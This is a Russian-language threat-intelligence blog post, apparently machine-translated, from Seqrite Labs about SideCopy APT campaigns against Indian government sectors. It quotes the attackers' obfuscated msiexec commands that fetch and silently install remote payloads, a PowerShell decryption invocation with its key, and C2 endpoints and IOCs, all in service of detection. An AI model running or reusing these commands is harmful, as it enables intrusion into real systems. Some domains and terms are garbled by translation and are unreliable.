• Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Seqrite Labs Блог
Связаться с отделом продаж Под обстрелом?
  • Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Главная  /  Фишинг  / Прощай, HTA, привет, MSI: новые TTP и кластеры APT, управляемые многоплатформенными атаками
Прощай, HTA, привет, MSI: новые TTP и кластеры APT, управляемые многоплатформенными атаками
08 апрель 2025

Прощай, HTA, привет, MSI: новые TTP и кластеры APT, управляемые многоплатформенными атаками

Написано Сатвик Рам Пракки
Сатвик Рам Пракки
Фишинг

Seqrite Команда Labs APT обнаружила новые тактики связанной с Пакистаном APT-группировки SideCopy, применяемые с последней недели декабря 2024 года. Группа расширила сферу своих атак, выйдя за рамки индийского правительства, оборонного, морского секторов и студентов университетов, и теперь включает в себя организации, находящиеся в ведении министерств железных дорог, нефти и газа, а также иностранных дел. Одним из заметных изменений в последних кампаниях является переход от использования файлов HTML-приложений (HTA) к использованию пакетов Microsoft Installer (MSI) в качестве основного механизма развертывания.

Злоумышленники постоянно совершенствуют свою тактику, чтобы избежать обнаружения, и этот сдвиг обусловлен их постоянным использованием сторонних DLL-загрузок и многоплатформенных вторжений. Эта эволюция также включает такие методы, как рефлексивная загрузка и перепрофилирование инструментов с открытым исходным кодом, таких как Xeno RAT и Spark RAT, в соответствии с его трендов с асинхронным RAT для расширения его возможностей. Кроме того, была обнаружена новая полезная нагрузка, получившая название CurlBack RAT, которая регистрирует жертву на сервере C2.

Ключевые результаты

  • Имена пользователей, связанные с идентификаторами электронной почты злоумышленников, выдают себя за сотрудников государственных органов, имеющих опыт работы в сфере кибербезопасности, используя скомпрометированные идентификаторы.
  • Поддельный домен, имитирующий службу электронного правительства, с открытым каталогом используется для размещения полезных нагрузок и страниц входа в систему для фишинга учетных данных.
  • На тринадцати поддоменах и URL-адресах размещены страницы входа в различные службы RTS для нескольких городских муниципальных корпораций (CMC), все в штате Махараштра.
  • Официальный домен Национального гидрологического проекта (NHP), находящегося в ведении Министерства водных ресурсов, был взломан с целью доставки вредоносных данных.
  • Новые тактики, такие как рефлексивная загрузка и расшифровка AES раздела ресурсов через PowerShell, для развертывания пользовательской версии инструмента с открытым исходным кодом на базе C# XenoRAT.
  • Модифицированный вариант инструмента SparkRAT с открытым исходным кодом на базе Golang, предназначенный для платформ Linux, был развернут через тот же стейджер ранее использовался для полезных нагрузок Poseidon и Ares RAT.
  • Используется новый RAT, получивший название CurlBack, использующий технику загрузки DLL. Он регистрирует жертву на сервере C2 по UUID и поддерживает передачу файлов с помощью curl.
  • Кампании под названием «медовая ловушка» наблюдались в январе 2025 года и июне 2024 года, что совпало с арестом государственного служащего, обвиняемого в передаче конфиденциальных данных пакистанскому куратору.
  • Образовательный портал, ранее взломанный в августе 2024 года, вновь активировался в феврале 2025 года с новыми URL-адресами, ориентированными на студентов университетов. Они посвящены трём различным темам: «Изменение климата», «Исследовательская работа» и «Профессиональная деятельность» (полный анализ можно посмотреть в записи). здесь, объясняя шесть различных кластеров SideCopy APT).
  • Родительская группа SideCopy, APT36, нацелилась на Афганистан после долгой кампании, связанной с Управлением по делам заключённых (OPA) Исламского Эмирата Афганистан. Недавняя кампания, направленная на системы Linux под девизом «Развитие лидерства для будущих войн», использует шифрование AES/RC4 для запуска инструмента MeshAgent RMM.

Целевые секторы в ведении индийского министерства

  • Железнодорожные пути
  • Нефть и Газ
  • внешние связи
  • Обороны

Фишинговые письма

Кампания, направленная на оборонный сектор, началась с фишингового письма от 13 января 2025 года с темой «Обновите график NDC 65, как обсуждалось». В письме содержалась ссылка на скачивание файла «NDC65-Updated-Schedule.pdf», призванного заманить жертву.

Рис. 1 – Фишинговое письмо NDC (1)

Второе фишинговое письмо, отправленное 15 января 2025 года с темой «Обновление политики для этого курса.txt», также содержит фишинговую ссылку. Это письмо отправлено с адреса электронной почты, выглядящего как официальный, но, вероятно, взломанного. Национальный колледж обороны (NDC) — это военное учебное заведение, специализирующееся на стратегии и практике национальной безопасности, расположенное в Дели и подчиняющееся Министерству обороны Индии.

Рис. 2 – Фишинговое письмо NDC (2)

Адрес электронной почты злоумышленника «gsosystems-ndc@outlook[.]com» был создан 10 января 2025 года в ОАЭ и последний раз был активен 28 февраля 2025 года. OSINT выявил похожий идентификатор электронной почты «gsosystems.ndc-mod@nic[.]in», принадлежащий Национальному центру информатики (NIC), подразделению Министерства электроники и информационных технологий Индии (MeitY). Имя пользователя, связанное с адресом электронной почты злоумышленника, выдаёт себя за сотрудника государственного органа, имеющего опыт работы в сфере кибербезопасности.

Рис. 3 – Электронное письмо злоумышленника

Документы-обманки

Ложная модель связана с Национальным колледжем обороны (NDC) в Индии и содержит ежегодный календарь подготовки (учебные занятия и мероприятия) на 2025 год для 65-го курса (NDC-65). Расположенный в Нью-Дели, этот учебный институт является высшим центром стратегического обучения для офицеров Вооружённых сил Индии и гражданских служб, находящихся в ведении Министерства обороны Индии.

Рис. 4 – Календарь NDC-приманка [Защита]
Другой обнаруженный фишинговый архивный файл с именем «2024-National-Holidays-RH-PER_N-1.zip» существует в двух различных вариантах, ориентированных на системы Windows и Linux. После активации вредоносной нагрузки он приводит к документу-обманке, содержащему список праздничных дней для сотрудников Open Line на 2024 год, как следует из названия. Это официальное уведомление Southern Railway от 19 декабря 2023 года, адресованное Ченнайскому отделению. Southern Railway (SR) — одна из восемнадцати зон Indian Railways, государственного предприятия Министерства железных дорог Индии.

Рис. 5 – Список праздничных дней-приманка [Железные дороги]
Третья цепочка заражения включает документ под названием «Руководство по кибербезопасности» на 2024 год, который, по-видимому, был выпущен Hindustan Petroleum Corporation Limited (HPCL). HPCL — это государственное предприятие нефтегазовой отрасли со штаб-квартирой в Мумбаи, являющееся дочерней компанией Oil and Natural Gas Corporation (ONGC), государственного предприятия Министерства нефти и природного газа Индии.

Рис. 6 – Приманка для кибербезопасности [Нефть и газ]
Другой документ, связанный с той же инфекцией, — «Каталог фармацевтической продукции» на 2025 год, выпущенный MAPRA. Он предназначен специально для сотрудников Министерства иностранных дел Индии. Mapra Laboratories Pvt. Ltd. — фармацевтическая компания со штаб-квартирой в Мумбаи.

Рис. 7 – Каталог-приманка [Внешние дела]

OpenDir и CredPhish

Для проведения кампании, направленной против железнодорожных компаний, использовался поддельный домен, выдающий себя за портал электронного управления. Этот домен был создан 16 июня 2023 года и представляет собой открытый каталог с несколькими файлами, выявленными в ходе расследования.

Рис. 8 – Открытый каталог

Всего было выявлено 13 поддоменов, которые функционируют как порталы входа в различные системы, такие как:

  • Webmail
  • Система управления безопасными резервуарами
  • Система начисления заработной платы
  • Установить полномочия

Вероятно, они используются для фишинга учётных данных, активно выдавая себя за несколько легитимных правительственных порталов с прошлого года. Эти страницы входа, как правило, связаны с RTS Services (Закон о праве на общественные услуги) и обслуживают различные городские муниципальные корпорации (CMC). Все эти поддельные порталы принадлежат городам, расположенным в штате Махараштра:

  • Чандрапур
  • Gadchiroli
  • Akola
  • Satara
  • Васаи Вирар
  • Балларпур
  • Мира Бхайндар
Рис. 9 – Порталы входа, размещенные на поддельном домене

В следующей таблице перечислены выявленные поддомены и даты их первого обнаружения:

Суб-домены Впервые увидели
gadchiroli.egovservice[.]in 2024-12-16
pen.egovservice[.]в 2024-11-27
cpcontacts.egovservice[.]в

cpanel.egovservice[.]в

webdisk.egovservice[.]в

cpcalendars.egovservice[.]в

webmail.egovservice[.]в

2024-01-03
dss.egovservice[.]в

cmc.egovservice[.]в

2023-11-03
mail.egovservice[.]в 2023-10-13
pakola.egovservice[.]в

pakora.egovservice[.]в

2023-07-23
egovservice[.]в 2023-06-16

Все эти домены имеют следующую историю DNS, изначально зарегистрированную под AS 140641 (YOTTA NETWORK SERVICES PRIVATE LIMITED). Это указывает на возможную скоординированную инфраструктуру, созданную для имитации легитимных сервисов и сбора учётных данных ничего не подозревающих пользователей.

Рис. 10 – История DNS

Дальнейшее исследование открытого каталога выявило дополнительные URL-адреса, связанные с поддельным доменом. Эти URL-адреса, вероятно, служат аналогичным фишинговым целям и содержат дополнительный поддельный контент.

hxxps://egovservice.in/vvcmcrts/
hxxps://egovservice.in/vvcmc_safety_tank/
hxxps://egovservice.in/testformonline/test_form
hxxps://egovservice.in/payroll_vvcmc/
hxxps://egovservice.in/pakora/egovservice.in/
hxxps://egovservice.in/dssrts/
hxxps://egovservice.in/cmc/
hxxps://egovservice.in/vvcmcrtsballarpur72/
hxxps://egovservice.in/dss/
hxxps://egovservice.in/130521/set_authority/
hxxps://egovservice.in/130521/13/

Кластер-А

Первый кластер операций SideCopy демонстрирует сложный подход, одновременно атакуя среды Windows и Linux. В их арсенале появились новые трояны удалённого доступа (RAT), что расширяет возможности по эффективному взлому различных систем.

Рис. 11 – Кластер А

Windows

Фишинговая ссылка в письме загружает архивный файл, содержащий ярлык с двойным расширением (.pdf.lnk). Они размещены на доменах, которые выглядят как настоящие:

hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/
hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/

Триггеры быстрого доступа cmd.exe с аргументами, использующими экранированные символы (^) для обхода обнаружения и ухудшения читаемости. В этих файлах отображается новый идентификатор машины «dv-kevin», поскольку обычно вместо него используется префикс «desktop-».

Рис. 12 – Ярлыки с двойным расширением

Утилита msiexec.exe используется для установки MSI-пакетов, размещенных удалённо. Она использует флаг тихого режима с ключом установки.

C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /ih^t^t^p^s^:^/^/^e^g^o^v^s^e^r^v^i^c^e^.^i^n^/^d^s^s^r^t^s^/^h^e^l^p^e^r^s^/^f^o^n^t^s^/^2^0^2^4^-^N^a^t^i^o^nal-^H^o^l^i^d^a^y^s^-^R^H^-^P^E^R^_^N-^1^/^i^n^s^t^/
C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /ih^t^t^p^s^:^/^/^n^h^p^.^m^o^w^r^.^g^o^v^.^i^n^/^N^H^P^M^I^S^/^T^r^a^i^n^i^n^g^M^a^t^e^r^i^a^l^/^a^s^p^x^/^S^e^c^u^r^i^t^y^-^G^u^i^d^e^l^i^n^e^s^/^w^o^n^t^/

Первый домен имитирует поддельный сайт электронного правительства, обнаруженный в открытом каталоге, а второй — взломанный домен, принадлежащий официальному Национальному гидрологическому проекту, организации, подведомственной Министерству водных ресурсов. MSI-файл содержит исполняемый файл .NET. ConsoleApp1.exe который сбрасывает несколько PE-файлов в кодировке Base64. Сначала сбрасывается документ-обманка Общая каталог и открывается, тогда как оставшиеся PE-файлы помещаются в 'C:\ProgramData\LavaSoft\'. Среди них есть две DLL:

  • Легитимная DLL: Sampeose.dll
  • Вредоносная DLL: DUI70.dll, идентифицированный как CurlBack RAT.
Рис. 13 – Дроппер в пакете MSI

CurlBack RAT

Подписанный двоичный файл Windows girbesre.exe с оригинальным именем Настройки камерыUIHost.exe размещается рядом с DLL-файлами. При запуске EXE-файл загружает вредоносную DLL-библиотеку. Устойчивость достигается за счёт размещения HTA-скрипта (svnides.hta), который создаёт раздел реестра «Run» для EXE-файла. Были обнаружены два разных образца вредоносной DLL-библиотеки с метками времени компиляции 2024-12-24 и 2024-12-30.

Рис. 14 – Проверка ответа '/antivmcommand'

CurlBack RAT изначально проверяет ответ на определённый URL-адрес с помощью команды '/antivmcommand'. Если ответ «on», он продолжает работу, в противном случае завершает работу, продолжая проверку. Он собирает информацию о системе и всех подключённых USB-устройствах, используя раздел реестра:

  • «SYSTEM\\ControlSet001\\Enum\\USBSTOR»
Рис. 15 – Получение информации о системе и USB-устройствах

Подключенные дисплеи и запущенные процессы перечисляются для проверки explorer, msedge, chrome, notepad, taskmgr, services, Defender и settings.

Рис. 16 – Перечисление дисплеев и процессов

Затем он генерирует UUID для регистрации клиента на сервере C2. Сгенерированный идентификатор сохраняется в «C:\Пользователи\ \.client_id.txt” вместе с именем пользователя.

Рис. 17 – Идентификатор клиента, сгенерированный для регистрации C2

Перед регистрацией с помощью идентификатора сохранение настраивается с помощью запланированной задачи с именем «Один диск» для законного двоичного файла, который можно наблюдать в месте: «C:\Windows\System32\Tasks\OneDrive».

Рис. 18 – Запланированная задача

Обратные строки, добавленные к домену C2, и их назначение:

строка Функциональность системы
/ретсигер/ Зарегистрируйте клиента в C2
/sdnammoc/ Получить команды из C2
/taebtraeh/ Регулярно проверяйте соединение с C2.
/stluser/ Загрузите результаты в C2

После регистрации соединение сохраняется активным для извлечения любых команд, возвращаемых в ответе.

Рис. 19 – Ответ на команды после регистрации

Если ответ содержит какое-либо значение, он извлекает текущую метку времени и выполняет одну из следующих команд C2:

Command Функциональность системы
info Сбор информации о системе
скачать Скачать файлы с хоста
настойчивость Изменить настройки сохранения
пробег Выполнять произвольные команды
извлечение Извлечь данные из системы
разрешение Проверить и повысить привилегии
пользователей Перечислить учетные записи пользователей
CMD Выполнение операций командной строки
Рис. 20 – Проверка привилегий процесса с помощью команды «permission»

Другие базовые функции включают получение данных пользователя и хоста, извлечение архивных файлов и создание задач. Строки и код показывают, что во вредоносной DLL присутствует CURL для перечисления и передачи различных форматов файлов:

  • Файлы изображений: GIF, JPEG, JPG, SVG
  • Текстовые файлы: TXT, HTML, PDF, XML
Рис. 21 – Поддерживаемые протоколы CURL

Linux

Помимо атак, ориентированных на Windows, первый кластер SideCopy также нацелен на среды Linux. Вредоносный архивный файл имеет то же имя, что и его аналог для Windows, но дата модификации — 2024 декабря 12 г. Этот архив содержит двоичный файл ELF на языке Go, что отражает последовательную кроссплатформенную стратегию. Анализ показал, что поток функций стейджера имеет сходство с кодом стейджеры Связаны с Poseidon и Ares RAT. Они связаны с APT-системами Transparent Tribe и SideCopy соответственно.

Рис. 22 – Golang Stager для Linux

Функциональность Stager:

  1. Пользы Wget команда для загрузки приманки из egovservice домен в целевой каталог /.local/share и откройте его (National-Holidays-RH-PER_N-1.pdf).
  2. Загрузите финальную полезную нагрузку эльф as /.local/share/xdg-open и выполнить.
  3. Создайте файл crontab '/dev/shm/mycron' для сохранения полезной нагрузки при перезагрузке системы под текущим именем пользователя.

Последняя полезная нагрузка, предоставляемая стейджером, — это Spark RAT, троян удалённого доступа с открытым исходным кодом и кроссплатформенной поддержкой Windows, macOS и Linux. Написанный на Golang и выпущенный на GitHub в 2022 году, RAT пользуется большой популярностью: существует более 500 форков. Spark RAT использует протокол WebSocket и HTTP-запросы для взаимодействия с сервером управления.

Рис. 23 – Кастомный Spark RAT «гром», подключаемый к C2

Возможности Spark RAT включают управление процессами и их завершение, мониторинг сетевого трафика, просмотр и передачу файлов, редактирование и удаление файлов, подсветку кода, мониторинг рабочего стола, создание снимков экрана, получение информации об ОС и удалённый терминальный доступ. Кроме того, Spark RAT поддерживает функции управления питанием, такие как выключение, перезагрузка, выход из системы, спящий режим, режим гибернации и блокировка экрана.

Кластер-Б

Вторая группа действий SideCopy нацелена на системы Windows, хотя мы подозреваем, что она нацелена на системы Linux, основываясь на их инфраструктуре, наблюдаемой с 2023 года.

Рис. 24 – Кластер B

Заражение начинается с фишинговой ссылки в электронном письме, которая загружает архивный файл с именем «NDC65-Updated-Schedule.zip». Он содержит файл-ярлык в формате с двойным расширением, который запускает удалённый HTA-файл, размещённый на другом скомпрометированном домене:

  • «hxxps://modspaceinterior.com/wp-content/upgrade/01/ & mshta.exe»
Рис. 25 – Архив с вредоносным LNK

Идентификатор машины, связанный с LNK «desktop-ey8nc5b», наблюдался в предыдущих кампаниях SideCopy, хотя дата модификации «2023:05:26» позволяет предположить, что это может быть более старый идентификатор, используемый повторно. Параллельно с MSI-стейджерами, группа продолжает использовать стейджеры на базе HTA, которые остаются практически незамеченными (FUD).

Рис. 26 – Почти FUD-стадирование HTA

Файл HTA содержит полезную нагрузку .NET, закодированную в Base64. BroaderAspect.dll, который декодируется и загружается непосредственно в память MSHTA. Этот двоичный файл открывает сброшенный документ-приманку NDC в ProgramData каталог и дополнительный .NET-шаг в виде PDF-файла в Общая Каталог. Устойчивость устанавливается через ключ реестра «Run» с именем «Edgre» и выполняется как:

  • cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

Зашифрованная полезная нагрузка

Удаленный двоичный файл .NET с именем «Myapp.pdb» имеет два файла ресурсов:

  • «Myapp.Resources.Document.pdf»
  • «Myapp.Properties.Resources.resources»

Первый из них декодируется с помощью Цезарь Шифр со сдвигом на 9 символов в обратном направлении. Отбрасывается как 'Публичные\Загрузки\Документ.pdf(122.98 КБ), представляющий собой документ GIAC 2004 года «Усовершенствованные методы связи троянских программ удаленного доступа в операционных системах Windows».

Рис. 27– Документ с приложенной полезной нагрузкой

Хотя это не обманка, в конце добавляется зашифрованная полезная нагрузка. Вредоносная программа ищет «%%EOFМаркер "" отделяет данные PDF от данных EXE. Данные PDF извлекаются от начала до маркера, а данные EXE извлекаются после пропуска 6 байтов после маркера.

Рис. 28 – Извлечение EXE-файла после маркера EOF

После некоторой задержки данные EXE удаляются как «Публичные\Загрузки\suport.exe» (49.53 КБ), который отправляется как аргумент вместе с ключом для запуска команды PowerShell.

Рис. 29 – Извлечение ресурса и запуск PowerShell

Стадия PowerShell

Наблюдается выполнение команды PowerShell с базовыми аргументами «-NoProfile -ExecutionPolicy Bypass -Command» для игнорирования политик и профиля. Передаются два параметра:

  • -EPath 'C:\\Users\\Public\\Downloads\\suport.exe'
  • -EKey 'wq6AHvkMcSKA++1CPE3yVwg2CpdQhEzGbdarOwOrXe0='

После некоторой задержки ключ шифрования декодируется из Base64, и первые 16 байт обрабатываются как вектор инициализации (IV) для шифрования AES (режим CBC с дополнением PKCS7). Это делается для загрузки расшифрованного двоичного файла как сборки .NET непосредственно в память, вызывая её точку входа.

Рис. 30 – Расшифровка PowerShell

Кастомный Xeno RAT

Выгрузка последней полезной нагрузки .NET под названием «DevApp.exe» приводит нас к знакомым функциям, встречающимся в Xeno RAT. Это троян с открытым исходным кодом для удалённого доступа, впервые замеченный в конце 2023 года. Среди его ключевых особенностей — HVNC, доступ к микрофону в режиме реального времени, обратный прокси-сервер Socks5, обход UAC, кейлоггер и многое другое. В пользовательской версии, используемой SideCopy, добавлены базовые методы манипуляции строками с помощью C2 и порта 79.141.161[.]58:1256.

Рис. 31 – Пользовательский Xeno RAT

В прошлом году модифицированный вариант Xeno RAT под названием MoonPeak использовался связанной с Северной Кореей группировкой APT, отслеживаемой как UAT-5394. Аналогичным образом, модифицированные варианты Spark RAT использовались китайскоязычными группировками, такими как DragonSpark и TAG-100.

Инфраструктура и атрибуция

Домены, используемые группой для размещения вредоносного ПО. Большинство из них зарегистрированы как GoDaddy.com, LLC.

Промежуточный домен Впервые увидели Создано ASN
modspaceinterior[.]com Январь 2025 сентябрь 2024 AS 46606 – GoDaddy
drjagrutichavan[.]com Январь 2025 октябрь 2021 AS 394695 – GoDaddy
nhp.mowr[.]gov[.]in Декабрь 2024 февраль 2005 AS 4758 – Национальный центр информатики
egovservice[.]в Декабрь 2024 Июнь 2023 AS 140641 – GoDaddy
pmshriggssssiwan[.]in ноябрь 2024 Mar 2024 AS 47583 – Хостингер
образовательные порталы[.]в август 2024 август 2024 AS 22612 – NameCheap

Домены C2 были созданы непосредственно перед кампанией в последнюю неделю декабря 2024 года. У канадского регистратора «Internet Domain Service BS Corp.» они преобразуются в IP-адреса с Cloudflare ASN 13335, расположенные в Калифорнии.

Домен C2 Создано IP ASN
обновления.widgetservicecenter[.]com 2024-Dec-25 104.21.15[.]163

172.67.163[.]31

 

ASN 13335 – Облако
updates.biossysinternal[.]com 2024-Dec-23 172.67.167[.]230

104.21.13[.]17

ASN 202015 – HZ Hosting Ltd.

C2 для Xeno RAT 79.141.161[.]58 имеет уникальное общее имя (CN=PACKERP-63KUN8U) у HZ Hosting Limited из ASN 202015. Для связи используется порт 1256, но также наблюдается открытый порт RDP 56777.

Рис. 32 – Модель ромба

Оба домена C2 связаны с Cloudflare ASN 13335, разрешенным в диапазон IP-адресов 172.67.xx.xx. Аналогичные домены C2 в этом ASN ранее использовались SideCopy для атак, направленных на морской С учётом прошлых кластеров заражения, наблюдаемых TTP и размещенных открытых каталогов, эти кампании с новыми TTP с высокой степенью достоверности можно отнести к SideCopy.

Заключение

Связанная с Пакистаном APT-группа SideCopy значительно усовершенствовала свою тактику с конца декабря 2024 года, расширив круг своих целей, включив в них такие критически важные секторы, как железные дороги, нефтегазовая отрасль и министерства иностранных дел. Группировка перешла от использования HTA-файлов к MSI-пакетам в качестве основного механизма реализации атак и продолжает применять передовые методы, такие как сторонняя загрузка DLL, рефлективная загрузка и расшифровка AES через PowerShell. Кроме того, они используют специализированные инструменты с открытым исходным кодом, такие как Xeno RAT и Spark RAT, а также недавно обнаруженный CurlBack RAT. Скомпрометированные домены и поддельные сайты используются для фишинга учетных данных и размещения полезной нагрузки, что свидетельствует о постоянных усилиях группировки по повышению устойчивости и уклонению от обнаружения.

SEQRITE Protection

  • LNK.SideCopy.49245.Gen
  • LNK.Trojan.49363.GC
  • SideCopy.Mal.49246.GC
  • HTA.SideCopy.49248.Gen
  • HTA.SideCopy.49247.Gen
  • HTA.Trojan.49362.GC
  • Trojan.Fmq

МНК

Windows

a5410b76d0cb36786e00d2968d3ab6e4 2024-Национальные-Праздники-RH-PER_N-1.zip
f404496abccfa93eed5dfda9d8a53dc6 2024-Национальные-Праздники-RH-PER_N-1.pdf.lnk
0e57890a3ba16b1ac0117a624f262e61 Security-Guidelines.zip
57c2f8b4bbf4037439317a44c2263346 Руководство по безопасности.pdf.lnk
53eebedc3846b7cf5e29a90a5b96c803 wininstaller.msi
97c3328427b72f05f120e9a98b6f9b09 installerr.msi
0690116134586d41a23baed300fc6355 ConsoleApp1.exe
ef40f484e095f0f6f207139cb870a16e ConsoleApp1.exe
9d189e06d3c4cefdd226e645a0b8bdb9 DUI70.dll
589a65e0f3fe6777d17d0ac36ab07f6f DUI70.dll
0eb9e8bec7cc70d603d2d8b6efdd6bb5 график обновления для ndc 65, как обсуждалось.txt
8ceeeec0e33026114f028cbb006cb7fc обновление политики для этого курса.txt
1d65fa0457a9917809660fff782689fe NDC65-Обновленное-Расписание.zip
7637cbfa99110fe8e1074e7ead66710e NDC65-Обновленное-Расписание.pdf.lnk
32a44a8f7b722b078b647e82cb9e85cf NDC65-Обновленное-Расписание.hta
a2dc9654b99f656b4ab30cf5d97fe2e1 BroaderAspect.dll
b45aa156aef2ad2c77b7c623a222f453 zuidrt.pdf
83ce6ee6ad09a466eb96f347a8b0dc20 Документ.pdf
cf6681cf1f765edb6cae81eeed389f78 support.exe
c952aca2036d6646c0cffde9e6f22775 DevApp.exe (пользовательский Xeno RAT)

Linux

b5e71ff3932c5ef6319b7ca70f7ba8da 2024-Национальные-Праздники-RH-PER_N-1.zip
0a67bfda993152c93a212087677f9b60 2024-Национальные-Праздники-RH-PER_N-1․pdf
e165114280204c39e99cf0c650477bf8 clinsixfer.elf (пользовательский Spark RAT)

C2

79.141.161[.]58:1256 Ксено КРЫСА
обновления.widgetservicecenter[.]com

updates.biossysinternal[.]com

CurlBack RAT

URL-адреса

hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/
hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/inst/
hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/clinsixfer.elf
hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/2024-National-Holidays-RH-PER_N-1.pdf
hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/
hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/wont/
hxxps://updates.widgetservicecenter.com/antivmcommand
hxxps://modspaceinterior.com/wp-content/upgrade/02/NDC65-Updated-Schedule.zip
hxxps://modspaceinterior.com/wp-content/upgrade/01/
hxxps://modspaceinterior.com/wp-content/upgrade/01/NDC65-Updated-Schedule.hta
hxxps://egovservice.in/vvcmcrts/
hxxps://egovservice.in/vvcmc_safety_tank/
hxxps://egovservice.in/testformonline/test_form
hxxps://egovservice.in/payroll_vvcmc/
hxxps://egovservice.in/pakora/egovservice.in/
hxxps://egovservice.in/dssrts/
hxxps://egovservice.in/cmc/
hxxps://egovservice.in/vvcmcrtsballarpur72/
hxxps://egovservice.in/dss/
hxxps://egovservice.in/130521/set_authority/
hxxps://egovservice.in/130521/13/

Промежуточные домены

modspaceinterior[.]com
drjagrutichavan[.]com
nhp.mowr[.]gov[.]in
pmshriggssssiwan[.]in
образовательные порталы[.]в
egovservice[.]в
gadchiroli.egovservice[.]in

pen.egovservice[.]в

cpcontacts.egovservice[.]в

cpanel.egovservice[.]в

webdisk.egovservice[.]в

cpcalendars.egovservice[.]в

webmail.egovservice[.]в

www.dss.egovservice[.]в

www.cmc.egovservice[.]в

cmc.egovservice[.]в

dss.egovservice[.]в

mail.egovservice[.]в

www.egovservice[.]в

www.pakola.egovservice[.]в

pakola.egovservice[.]в

www.pakora.egovservice[.]в

pakora.egovservice[.]в

Хост и PDB

C:\ProgramData\LavaSoft\Sampeose.dll
C:\ProgramData\LavaSoft\DUI70.dll
C:\ProgramData\LavaSoft\girbesre.exe
C:\ProgramData\LavaSoft\svnides.hta
C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf
C:\Users\Public\Downloads\Document.pdf
C:\Users\Public\Downloads\suport.exe
E:\finalRnd\Myapp\obj\Debug\Myapp.pdb

Приманки

320bc4426f4f152d009b6379b5257c78 2024-Национальные-Праздники-RH-PER_N-1.pdf
9de50f9357187b623b06fc051e3cac4f Руководство по безопасности.pdf
c9c98cf1624ec4717916414922f196be NDC65-Обновленное-Расписание.pdf
83ce6ee6ad09a466eb96f347a8b0dc20 Документ.pdf

MITRE ATT & CK

ТТП Имя
разведывательный  
T1589.002 Сбор информации о личности жертвы: адреса электронной почты
Развитие ресурсов  
T1583.001

T1584.001

T1587.001

T1588.001

T1588.002

T1608.001

T1608.005

T1585.002

T1586.002

Приобретение инфраструктуры: домены

Инфраструктура компрометации: домены

Возможности развития: вредоносное ПО

Получить возможности: вредоносное ПО

Получить возможности: инструмент

Возможности этапа: загрузка вредоносного ПО

Возможности этапа: Ссылка на цель

Создание учетных записей: учетные записи электронной почты

Взлом учетных записей: учетные записи электронной почты

Первоначальный доступ
T1566.002 Фишинг: Ссылка на фишинг
Типы
T1106

T1129

T1059

T1047

T1204.001

T1204.002

Родной API

Общие модули

Интерпретатор команд и сценариев

Инструментарий управления Windows

Казнь пользователя: вредоносная ссылка

Пользовательское выполнение: вредоносный файл

Настойчивость
T1053.003

T1547.001

Запланированная задача/задание: Cron

Ключи запуска реестра / Папка автозагрузки

Повышение привилегий
T1548.002 Злоупотребление механизмом контроля за повышением прав: обход контроля учетных записей пользователей
Уклонение от защиты
T1036.005

T1036.007

T1140

T1218.005

T1574.002

T1027

T1620

Маскарадинг: Соответствие законному имени или местоположению

Маскарад: двойное расширение файла

Деобфускация/декодирование файлов или информации

Выполнение системного двоичного прокси: Mshta

Поток выполнения Hijack: боковая загрузка DLL

Замаскированные файлы или информация

Отражающая загрузка кода

Дискавери
T1012

T1016

T1033

T1057

T1082

T1083

T1518.001

Реестр запросов

Обнаружение конфигурации сети системы

Обнаружение владельца системы/пользователя

Обнаружение процесса

Обнаружение системной информации

Обнаружение файлов и каталогов

Обнаружение программного обеспечения: обнаружение программного обеспечения безопасности

‎
T1005

T1056.001

T1123

T1113

T1560.001

Данные из локальной системы

Захват ввода: кейлоггинг

Аудиозапись

Захват экрана

Архивировать собранные данные: Архивировать с помощью утилиты

Управление и контроль
T1105

T1571

Входной инструмент передачи

Нестандартный порт

эксфильтрации
